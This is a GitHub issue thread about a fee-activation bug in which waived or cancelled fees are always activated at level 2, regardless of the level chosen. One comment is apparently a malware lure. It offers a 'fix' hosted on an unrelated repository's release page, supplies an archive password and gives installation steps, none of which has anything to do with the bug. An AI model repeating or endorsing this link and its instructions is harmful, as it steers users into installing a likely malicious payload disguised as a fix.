### ISSUE TITLE
Activación. El sistema activa cuotas pero siempre con nivel 2

### ISSUE THREAD

**Issue by rsherrera** [rsherrera/project-caja#396]
Si las cuotas a elegir son las eximidas o anuladas y el nivel elegido es diferente a 2, cuando finaliza el proceso de activación el sistema activa la cuota en nivel 2 y no en el nivel elegido.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rsherrera** [comment]
INCIDENTE CREADO INCORRECTAMENTE. YA EXISTE LA SOLUCION EN VM 2
